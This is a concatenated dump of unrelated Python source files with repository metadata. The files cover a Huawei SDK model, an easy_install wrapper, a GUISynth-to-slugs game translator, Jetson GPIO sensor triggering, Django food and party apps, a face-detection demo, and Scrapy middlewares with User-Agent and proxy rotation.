        # models and lists/dicts of models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # Sensitive attributes are masked in the dumped dict.
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            # Python 2 only: force UTF-8 as the default encoding so that
            # non-ASCII field values serialize without errors.
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ListPortStatisticsResponse):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
3eab1b761be0160d622ff707caaff063326f4b71 | 6c5ce1e621e0bd140d127527bf13be2093f4a016 | /ex021/venv/Scripts/easy_install-3.7-script.py | e7deca8d0b6f3b28588ce8d8072d461ed000115f | [
"MIT"
] | permissive | ArthurAlesi/Python-Exercicios-CursoEmVideo | 124e2ee82c3476a5a49baafed657788591a232c1 | ed0f0086ddbc0092df9d16ec2d8fdbabcb480cdd | refs/heads/master | 2022-12-31T13:21:30.001538 | 2020-09-24T02:09:23 | 2020-09-24T02:09:23 | 268,917,509 | 0 | 0 | null | null | null | null | ISO-8859-2 | Python | false | false | 508 | py | #!C:\Users\User\Documents\github-MeusRepositórios\Python-Exercicios-CursoEmVideo\ex021\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the setuptools wrapper suffix ("-script.py"/".exe") from argv[0]
    # so usage/help output shows the bare command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    # Resolve the 'easy_install-3.7' console entry point of the pinned
    # setuptools version and invoke it; its return value is the exit status.
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
    )
| [
"54421573+ArthurAlesi@users.noreply.github.com"
] | 54421573+ArthurAlesi@users.noreply.github.com |
536f0f4c79b3a562c018f6d57f29211e768b5a38 | 40cb46b3f9ec1dd792578e8f423e3fa02e844ec2 | /tools/ExplicitGameToSlugsTranslator/translator.py | 5bea04c1b6c3a8fd6a946efb560ff77d1885d54f | [] | no_license | tuc-es/guisynth | ac83acfc6c3086a38a06b7c1aa9543e69531d369 | 46e71eb37361aa42b5eb47139ef799a3a116faf6 | refs/heads/master | 2021-11-22T13:59:21.241793 | 2021-08-05T11:17:13 | 2021-08-05T11:17:13 | 185,566,388 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,440 | py | #!/usr/bin/env python3
#
# Translates a game for GUISynth to a specification file for slugs.
#
# Reads from stdin, writes to stdout
import os, sys
# Check preamble
firstLine = sys.stdin.readline()
if firstLine.strip()!="UVWBasedGame":
    print("Error: Expected a UVWBasedGame.",file=sys.stderr)
    sys.exit(1)
# Declare variables
inputSignals = []
outputSignals = []
states = [] # Format: (name,typeBool--assumptions=False)
rejectingStates = []
initialStates = []
transitions = []
# Read input lines. Accepted line formats:
#   Input <name>
#   Output <name>
#   State Assumptions|Guarantees <name> [reject] [initial]
#   Transition Assumptions|Guarantees <from> <label tokens...> <to>
for line in sys.stdin.readlines():
    lineparts = line.strip().split(" ")
    if lineparts[0]=="Input":
        assert len(lineparts)==2
        inputSignals.append(lineparts[1])
    elif lineparts[0]=="Output":
        assert len(lineparts)==2
        outputSignals.append(lineparts[1])
    elif lineparts[0]=="State":
        assert lineparts[1] in ["Assumptions","Guarantees"]
        stateName = lineparts[2]
        # States are stored as (name, isGuaranteeState) pairs.
        states.append((stateName,lineparts[1]=="Guarantees"))
        for flag in lineparts[3:]:
            if flag=="reject":
                rejectingStates.append((stateName,lineparts[1]=="Guarantees"))
            elif flag=="initial":
                initialStates.append((stateName,lineparts[1]=="Guarantees"))
            else:
                raise Exception("Unknown state flag: "+flag)
    elif lineparts[0]=="Transition":
        assert lineparts[1] in ["Assumptions","Guarantees"]
        typeFlag = lineparts[1]=="Guarantees"
        # (isGuarantee, fromState, toState, label tokens)
        transitions.append((typeFlag,lineparts[2],lineparts[-1],lineparts[3:-1]))
# Turn length for the output player
limit_turnlength = 16
# Input Propositions and Output Propositions.
# Each signal is encoded as the binary number (signal index + 1) over the
# atomic propositions, so the all-zero assignment is reserved for "no action";
# the proposition counts below are the bits needed for that encoding.
nofInputPropositions = 1
while (1 << nofInputPropositions) <= len(inputSignals):
    nofInputPropositions += 1
nofOutputPropositions = 1
while (1 << nofOutputPropositions) <= len(outputSignals):
    nofOutputPropositions += 1
inputPropositions = ["inap"+str(a) for a in range(0,nofInputPropositions)]
outputPropositions = ["outap"+str(a) for a in range(0,nofOutputPropositions)]
# Encode signals into propositions. "Pre" encodings use unprimed variables,
# "Post" encodings the primed (next-state) variables; both are conjunctions
# in slugs' prefix-operator syntax.
signalEncodingsPre = {}
signalEncodingsPost = {}
# ---> input
for i,a in enumerate(inputSignals):
    m = ("& "*(nofInputPropositions-1)).strip()
    mP = ("& "*(nofInputPropositions-1)).strip()
    for j in range(0,nofInputPropositions):
        if ((1 << j) & (i+1))>0:
            m = m + " "+inputPropositions[j]
            mP = mP + " "+inputPropositions[j]+"'"
        else:
            m = m + " ! "+inputPropositions[j]
            mP = mP + " ! "+inputPropositions[j]+"'"
    signalEncodingsPre[a] = m
    signalEncodingsPost[a] = mP
# ---> output
for i,a in enumerate(outputSignals):
    m = ("& "*(nofOutputPropositions-1)).strip()
    mP = ("& "*(nofOutputPropositions-1)).strip()
    for j in range(0,nofOutputPropositions):
        if ((1 << j) & (i+1))>0:
            m = m + " "+outputPropositions[j]
            mP = mP + " "+outputPropositions[j]+"'"
        else:
            m = m + " ! "+outputPropositions[j]
            mP = mP + " ! "+outputPropositions[j]+"'"
    signalEncodingsPre[a] = m
    signalEncodingsPost[a] = mP
assert len(signalEncodingsPre)==len(inputSignals)+len(outputSignals)
# No action: the all-false assignment over the respective propositions.
noActionOutputPre = ("& "*(nofOutputPropositions-1))+" ".join(["! "+a for a in outputPropositions])
noActionOutputPost = ("& "*(nofOutputPropositions-1))+" ".join(["! "+a+"'" for a in outputPropositions])
noActionInputPre = ("& "*(nofInputPropositions-1))+" ".join(["! "+a for a in inputPropositions])
noActionInputPost = ("& "*(nofInputPropositions-1))+" ".join(["! "+a+"'" for a in inputPropositions])
# Define action encoding function
def encodeAction(actionList):
    """Map each action token to its proposition encoding.

    Tokens present in signalEncodingsPre are replaced by their encoded
    (unprimed) form; any other token passes through unchanged.
    """
    return [signalEncodingsPre.get(token, token) for token in actionList]
# Sanity check..... the first output signal must be the "done" marker used
# in the turn semantics below.
assert outputSignals[0]=="done"
# Generate Preamble: variable declarations for the slugs specification.
print("[INPUT]")
for i in inputPropositions:
    print(i)
print("\n[OUTPUT]")
for o in outputPropositions:
    print(o)
# One boolean per UVW state, prefixed g_/a_ for guarantee/assumption parts.
for (statename,typ) in states:
    if typ:
        combined = "g_"+statename
    else:
        combined = "a_"+statename
    print(combined)
# Special output action: mode.
print("turn")
print("turnlength:0..."+str(limit_turnlength-1))
# Initial state: exactly the states flagged "initial" are active.
print("\n[SYS_INIT]")
for (statename,typ) in states:
    if typ:
        combined = "g_"+statename
    else:
        combined = "a_"+statename
    if (statename,typ) in initialStates:
        print(combined)
    else:
        print("! "+combined)
print("! turn")
# Input Actions -- Exactly one
print("\n[ENV_INIT]\n")
# Initially, exactly one valid input.
print("| "*(len(inputSignals)-1)+" ".join([signalEncodingsPre[a] for a in inputSignals]))
print("\n[ENV_TRANS]\n")
# Either there is an input or not
print("| "*len(inputSignals)+" ".join([signalEncodingsPost[a] for a in inputSignals])+" "+noActionInputPost)
# No turn? No input!
for a in inputSignals:
    print("| turn ! "+signalEncodingsPost[a])
# If there is a turn, then valid input
print("| ! turn "+"| "*(len(inputSignals)-1)+" ".join([signalEncodingsPost[a] for a in inputSignals]))
# Output Actions -- Initially none
print("\n[SYS_INIT]")
print(noActionOutputPre)
# Output Actions - afterwards, one if it is not the environment player's turn
print("\n[SYS_TRANS]")
outputVarsPrimed = [a+"'" for a in outputSignals]
print("| "*len(outputSignals)+" ".join([signalEncodingsPost[a] for a in outputSignals])+" turn")
for a in outputSignals:
    print("| ! turn ! "+signalEncodingsPost[a])
# SYS_TRANS -- Turn semantics -- The variable tells if it is the environment player's turn NEXT --
print("[SYS_TRANS]")
print("turn -> ! turn'")
print("! turn -> (turnlength'=turnlength+1)")
# encode "! turn -> (done' <-> turn')"
print("| turn ! ^ turn' "+signalEncodingsPost["done"])
# Updating the state information: a state is active next iff some incoming
# transition (same part, matching label) fires from an active state.
print("[SYS_TRANS]")
for (name,stateType) in states:
    if stateType:
        prefix = "g_"
    else:
        prefix = "a_"
    incoming = []
    for (typeflag,fromState,toState,label) in transitions:
        # print((typeflag,fromState,toState,label))
        if typeflag==stateType and toState==name:
            # Normalize the TRUE/FALSE label markers to slugs' 1/0 literals.
            def retrue(k):
                if k=="TRUE":
                    return "1"
                elif k=="FALSE":
                    return "0"
                return k
            incoming.append((fromState,[retrue(a) for a in label]))
    # print(incoming)
    print("! ^ "+prefix+name+"' "+"| "*(len(incoming))+" ".join(["& "+prefix+fromstate+" "+" ".join(encodeAction(label)) for (fromstate,label) in incoming]+["0"]))
# Liveness assumptions & Guarantees: rejecting states must not stay active
# forever via their self-loops.
for (name,stateType) in rejectingStates:
    if stateType:
        prefix = "g_"
        print("[SYS_LIVENESS]")
    else:
        prefix = "a_"
        print("[ENV_LIVENESS]")
    incoming = []
    for (typeflag,fromState,toState,label) in transitions:
        # print((typeflag,fromState,toState,label))
        if typeflag==stateType and toState==name and fromState==name:
            # Same TRUE/FALSE normalization as above, for self-loop labels.
            def retrue(k):
                if k=="TRUE":
                    return "1"
                elif k=="FALSE":
                    return "0"
                return k
            incoming.append([retrue(a) for a in label])
    print("| | ! "+prefix+name+" ! "+prefix+name+"' ! "+"| "*(len(incoming))+" ".join([" ".join(encodeAction(label)) for label in incoming]+["0"]))
# Special waiting semantics: The system must never be in a state where it is waiting, but the environment is not.
# print(rejectingStates)
for (postFlag,section) in [(True,"[SYS_TRANS]"),(False,"[SYS_INIT]")]:
    print(section)
    # postFlag selects primed (next-state) vs. unprimed variables.
    if postFlag:
        postfix="'"
    else:
        postfix=""
    rejectingAssumptionStates = ["a_"+a+postfix for (a,b) in rejectingStates if not b]+["0"]
    if postFlag:
        rejectingAssumptionStates.append("! turn")
    for (nameA,flagA) in rejectingStates:
        if flagA==True:
            print("| ! g_"+nameA+postfix+" "+"| "*(len(rejectingAssumptionStates)-1)+" ".join(rejectingAssumptionStates))
# Special Error semantics: leaving the first guarantee state without the
# system's turn forces the first assumption state.
systemStates = [a for (a,b) in states if b]
environmentStates = [a for (a,b) in states if not b]
print("[SYS_TRANS]")
print("| | ! turn ! g_"+systemStates[0]+"' a_"+environmentStates[0]+"'")
print("[SYS_INIT]")
print("| ! g_"+systemStates[0]+" a_"+environmentStates[0])
| [
"rehlers@uni-bremen.de"
] | rehlers@uni-bremen.de |
caec9dc5aef8d0e7b90c14f7279598cbf41b4316 | c5a413defa9410ab9c286733eb5926faecd57967 | /gpio_sync.py | b62d7e326876dbab393e179aadcba042811dcfa2 | [] | no_license | StevenWang30/tx2_sync | 4f01519b193e504e22e48b8ee535f8e44d7bc722 | 9dbb98208976643dbb85a15c477c380b14139833 | refs/heads/main | 2023-01-04T16:04:35.653847 | 2020-11-01T09:34:39 | 2020-11-01T09:34:39 | 309,049,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | import Jetson.GPIO as GPIO
import time as time # import the required libraries
# BOARD-numbered pins wired to the LiDAR and camera trigger lines.
lidar_trigger = 11
camera_trigger = 13
GPIO.setmode(GPIO.BOARD)
# Earlier software-toggled sync attempt, kept commented out for reference:
# GPIO.setup(lidar_trigger, GPIO.OUT)
# GPIO.setup(camera_trigger, GPIO.OUT)
#
# trig = 0
#
# try:
#     while (True):
#         if trig % 10 == 0:
#             GPIO.output(lidar_trigger, GPIO.HIGH)
#             GPIO.output(camera_trigger, GPIO.HIGH)
#             time.sleep(0.1)
#
#         GPIO.output(lidar_trigger, GPIO.LOW)
#         GPIO.output(camera_trigger, GPIO.LOW)
#
#         trig += 1
# except KeyboardInterrupt:
#     GPIO.cleanup()
#
# Drive both trigger lines with PWM at the same rate (50 Hz, 25% duty)
# so the LiDAR and camera fire on a common clock.
GPIO.setup(lidar_trigger, GPIO.OUT, initial=GPIO.HIGH)
l_t = GPIO.PWM(lidar_trigger, 50) # 50Hz
l_t.start(25) # 25% duty cycle
GPIO.setup(camera_trigger, GPIO.OUT, initial=GPIO.HIGH)
c_t = GPIO.PWM(camera_trigger, 50) # 50Hz
c_t.start(25) # 25% duty cycle
print("PWM running. Press CTRL+C to exit.")
try:
    while True:
        # p.ChangeDutyCycle(dc) # where 0.0 <= dc <= 100.0
        # Nothing to do while PWM runs; just idle until Ctrl+C.
        time.sleep(1)
finally:
    # Always stop both PWM channels and release the pins, even on Ctrl+C.
    l_t.stop()
    c_t.stop()
    GPIO.cleanup()
| [
"swangcy@connect.ust.hk"
] | swangcy@connect.ust.hk |
5aff8eeaf3871181bde40cf06cdc1e1796769831 | 44632954ff66bc603851f7d5d64a720326324dfe | /party/models.py | 9e43be5b94bac07e1f18d7596e658c9149306e8b | [] | no_license | yangliclai/partygo | 95ff8f0e298a5ae5c3e2d8d5ffe86f1038048bf6 | 54f7c320a35e6d58fd8bb2fd2d882abe646df1e1 | refs/heads/master | 2020-03-18T22:52:54.304965 | 2018-05-31T04:44:15 | 2018-05-31T04:44:15 | 135,371,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | from application import db
from user.models import User
class Party(db.Document):
    """MongoDB document describing one party event."""
    name = db.StringField(required=True)  # party title
    place = db.StringField(required=True)  # venue name shown to users
    location = db.PointField(required=True)  # GeoJSON point of the venue
    start_datetime = db.DateTimeField(required=True)  # when the party starts
    end_datetime = db.DateTimeField(required=True)  # when the party ends
    party_photo = db.StringField()  # optional photo reference -- presumably a path/URL; confirm with upload code
    description = db.StringField(min_length=50,required=True)  # at least 50 characters
    host = db.ObjectIdField(required=True)  # ObjectId of the hosting user
    cancel = db.BooleanField(default=False)  # set True when the host cancels
attendees = db.ListField(db.ReferenceField(User)) | [
"yangliclai@gmail.com"
] | yangliclai@gmail.com |
62b098b0cfa04bde31dd06873998aa6dfb5082de | 83ad3bfdc3fa5e5b657dff7cd386789b2c6478dd | /face_detection_fr_hog.py | fb0cd44499f5c8840030677171b65aad2703c976 | [] | no_license | amombofortune/Face-detection-with-OpenCV | 7a0af5b99b3851a6a8b779a2949c5c9307cf6bed | 50ba4787d18a9d8f5d14441bf9e11beeb45390aa | refs/heads/main | 2023-07-11T21:39:53.458345 | 2021-07-05T08:10:35 | 2021-07-05T08:10:35 | 383,062,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,558 | py | """
Face detection using face_recognition HOG face detector
"""
import cv2
import face_recognition
from matplotlib import pyplot as plt
def show_img_with_matplotlib(color_img, title, pos):
    """Draw a BGR image in subplot `pos` of a 1x2 matplotlib grid."""
    # Reverse the channel axis: OpenCV stores BGR, matplotlib expects RGB.
    rgb_image = color_img[:, :, ::-1]
    plt.subplot(1, 2, pos)
    plt.imshow(rgb_image)
    plt.title(title)
    plt.axis("off")
def show_detection(image, faces):
    """Draw a blue rectangle around every detected face; return the image."""
    # Each face is a (top, right, bottom, left) tuple as produced by
    # face_recognition.face_locations.
    for top, right, bottom, left in faces:
        cv2.rectangle(image, (left, top), (right, bottom), (255, 0, 0), 10)
    return image
# Load the test image (BGR, as returned by OpenCV).
img = cv2.imread("id_sample.png")
# Convert the image from BGR (which OpenCV uses) to RGB (which face_recognition uses)
rgb = img[:, :, ::-1]
# Perform face detection using face_recognition (internally calls dlib HOG face
# detector) with 0 and 1 upsampling passes (more upsampling finds smaller faces).
rects_1 = face_recognition.face_locations(rgb, 0, "hog")
rects_2 = face_recognition.face_locations(rgb, 1, "hog")
# Draw face detections on separate copies of the original image.
img_faces_1 = show_detection(img.copy(), rects_1)
img_faces_2 = show_detection(img.copy(), rects_2)
# Create the dimensions of the figure and set title
fig = plt.figure(figsize=(10, 4))
plt.suptitle("Face detection using face_recognition", fontsize = 14, fontweight = 'bold')
fig.patch.set_facecolor('silver')
# Plot the images
show_img_with_matplotlib(img_faces_1, "face_locations(rgb, 0, hog): " + str(len(rects_1)), 1)
# Bug fix: the second subplot previously re-plotted img_faces_1 even though
# its title describes the upsampled detection; show img_faces_2 instead.
show_img_with_matplotlib(img_faces_2, "face_locations(rgb, 1, hog): " + str(len(rects_2)), 2)
# Show the figure
plt.show()
| [
"82210852+amombofortune@users.noreply.github.com"
] | 82210852+amombofortune@users.noreply.github.com |
194af4a318b3024867f3c0710f450671889ab563 | e81e8a033e38bc0d46d58e7ee7e33e77d3242d57 | /Food/views.py | 1602bf914418ee1b214fd25e923ae8d15e50b801 | [] | no_license | vthdat/-Django-WebsiteCanTinProject | 116530efd959a3e6563a6e43a22cff8992d3d9b2 | 76fefcd1ed7c4acced3976abd80c4e4d711a567c | refs/heads/master | 2023-07-30T06:42:10.789337 | 2020-07-16T18:39:04 | 2020-07-16T18:39:04 | 277,478,650 | 0 | 0 | null | 2021-09-22T19:31:17 | 2020-07-06T07:57:31 | JavaScript | UTF-8 | Python | false | false | 2,936 | py | from django.shortcuts import render, redirect, get_object_or_404
from django.views.generic import ListView, DetailView
from .models import Food
from cart.forms import CartAddFoodForm
from cart.cart import Cart
# Create your views here.
class FoodListView(ListView):
    """Landing list view: one queryset per meal-type code."""
    model = Food
    template_name = 'food_list.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Group the menu by meal type and expose the add-to-cart form.
        context.update({
            'beverage_list': Food.objects.filter(food_type='BE'),
            'breakfast_list': Food.objects.filter(food_type='BR'),
            'lunch_list': Food.objects.filter(food_type='LU'),
            'dinner_list': Food.objects.filter(food_type='DI'),
            'snack_list': Food.objects.filter(food_type='SN'),
            'cart_product_form': CartAddFoodForm(),
        })
        return context
class FoodDetailView(DetailView):
    """Detail page for one food item, with same-type suggestions."""
    model = Food
    template_name = 'food_detail.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Suggest other items of the same meal type, excluding this one.
        same_type = Food.objects.filter(food_type=self.object.food_type)
        context['food_list'] = same_type.exclude(id=self.object.id)
        context['cart_product_form'] = CartAddFoodForm()
        return context
class FoodBreakfastListView(ListView):
    """List view filtered to breakfast items (food_type 'BR')."""
    model = Food
    template_name = 'custom_food_list.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context.update({
            'food_list': Food.objects.filter(food_type='BR'),
            'cart_product_form': CartAddFoodForm(),
        })
        return context
class FoodLunchListView(ListView):
    """List view filtered to lunch items (food_type 'LU')."""
    model = Food
    template_name = 'custom_food_list.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context.update({
            'food_list': Food.objects.filter(food_type='LU'),
            'cart_product_form': CartAddFoodForm(),
        })
        return context
class FoodDinnerListView(ListView):
    """List view filtered to dinner items (food_type 'DI')."""
    model = Food
    template_name = 'custom_food_list.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context.update({
            'food_list': Food.objects.filter(food_type='DI'),
            'cart_product_form': CartAddFoodForm(),
        })
        return context
class FoodBeverageListView(ListView):
    """List view filtered to beverages (food_type 'BE')."""
    model = Food
    template_name = 'custom_food_list.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context.update({
            'food_list': Food.objects.filter(food_type='BE'),
            'cart_product_form': CartAddFoodForm(),
        })
        return context
class FoodSnackListView(ListView):
    """List view filtered to snacks (food_type 'SN')."""
    model = Food
    template_name = 'custom_food_list.html'
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context.update({
            'food_list': Food.objects.filter(food_type='SN'),
            'cart_product_form': CartAddFoodForm(),
        })
        return context
| [
"vd.thanhdat@gmail.com"
] | vd.thanhdat@gmail.com |
e781738d385aeb71213da6c16ad550345f8a5af5 | 71c1ce0ef45aee12066a56b4e7bf2f5d8a95f9c2 | /foodsecurity/foodsecurity/middlewares.py | b82601c0976a812927e51fdf9926cabe5bd76ff0 | [] | no_license | chengchaoccss/crawlproject | 4c26f8255f62e9099f084fb32ef7bd045c84a11c | 7bb02d8314492ed7221ef6054e2b7f1a0bc15a3a | refs/heads/master | 2021-01-05T03:58:21.392217 | 2020-02-17T09:29:17 | 2020-02-17T09:29:17 | 240,871,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,029 | py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
import random
class FoodsecuritySpiderMiddleware(object):
    """Pass-through spider middleware (Scrapy template, behavior unchanged).

    Scrapy only calls the hooks that are defined; every hook below keeps
    the default pass-through semantics.
    """
    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy to build the middleware; also wires the
        # spider_opened signal so we can log when a spider starts.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware
    def process_spider_input(self, response, spider):
        # Returning None lets the response continue into the spider untouched.
        return None
    def process_spider_output(self, response, result, spider):
        # Forward every item/request produced by the spider unchanged.
        yield from result
    def process_spider_exception(self, response, exception, spider):
        # No special handling: fall through to the remaining middlewares.
        pass
    def process_start_requests(self, start_requests, spider):
        # Forward the spider's start requests unchanged.
        yield from start_requests
    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class FoodsecurityDownloaderMiddleware(object):
    """Pass-through downloader middleware (Scrapy template, behavior
    unchanged): requests and responses flow through unmodified.
    """
    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy to build the middleware; also wires the
        # spider_opened signal so we can log when a spider starts.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware
    def process_request(self, request, spider):
        # Returning None tells Scrapy to keep processing the request with
        # the other middlewares / the downloader itself.
        return None
    def process_response(self, request, response, spider):
        # Hand the downloaded response back unchanged.
        return response
    def process_exception(self, request, exception, spider):
        # No special handling: continue Scrapy's normal exception chain.
        pass
    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class UserAgentDownloadMiddleware(object):
    """Downloader middleware that rotates the User-Agent header: every
    outgoing request gets one identity drawn at random from the pool below.
    """
    USER_AGENTS = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0",
        "Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36",
    ]
    def process_request(self, request, spider):
        # Overwrite (or set) the header with a randomly chosen identity.
        request.headers['User-Agent'] = random.choice(self.USER_AGENTS)
class IpproxyDownloadMiddleware(object):
    """Downloader middleware that routes every request through an HTTP
    proxy drawn at random from a fixed "host:port" pool.
    """
    PROXIES = '''
    58.218.92.157:19220
    58.218.214.132:19264
    58.218.92.87:17595
    58.218.214.152:15911
    183.161.228.148:4351
    58.218.214.150:15894
    101.205.147.33:4332
    58.218.92.30:15020
    58.218.214.142:16198
    110.241.197.210:4367
    58.218.92.81:13120
    111.75.38.43:4376
    114.233.8.244:4336
    58.218.92.157:18509
    58.218.214.137:19357
    58.218.214.158:16592
    112.83.142.48:4331
    58.218.214.149:15834
    58.218.214.136:17019
    58.218.214.133:15155'''
    # Split the block above into a list of "host:port" strings once, at
    # class-definition time.
    PROXIES = PROXIES.split()
    def process_request(self, request, spider):
        # Pick one pool member at random and hand it to Scrapy's proxy
        # machinery via request.meta.
        chosen = random.choice(self.PROXIES)
        request.meta["proxy"] = "http://" + chosen
"Alfred_CC@outlook.com"
] | Alfred_CC@outlook.com |
18e73ec24b79d119113170322f4767f8acfe8a9d | c1e93f2110db91b22609762aa1c9cfcf608c0975 | /music/migrations/0011_auto_20200524_1957.py | 6f544b80b074449c1e56729154243316ae5072bb | [] | no_license | eliyajoseph7/music_app | 6f49979726b65cc9b664602acd263d2b787128b0 | 802780e6186f7cd3ba27a4b1c21f09f701c7cb1e | refs/heads/master | 2022-07-04T22:54:22.775210 | 2020-05-24T19:44:38 | 2020-05-24T19:44:38 | 264,457,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | # Generated by Django 3.0.2 on 2020-05-24 16:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Reshape the `aboutme` model: rename `hobby` to `accomplish`, drop
    `skills`, and add the `experiance` and `work` text fields."""
    dependencies = [
        ('music', '0010_aboutme'),
    ]
    operations = [
        # `hobby` becomes `accomplish`; existing data is preserved by the rename.
        migrations.RenameField(
            model_name='aboutme',
            old_name='hobby',
            new_name='accomplish',
        ),
        migrations.RemoveField(
            model_name='aboutme',
            name='skills',
        ),
        # New nullable text columns defaulting to the empty string.
        # (Note: "experiance" is the field's actual, misspelled name.)
        migrations.AddField(
            model_name='aboutme',
            name='experiance',
            field=models.TextField(default='', null=True),
        ),
        migrations.AddField(
            model_name='aboutme',
            name='work',
            field=models.TextField(default='', null=True),
        ),
    ]
| [
"exaveryeliya20@gmail.com"
] | exaveryeliya20@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.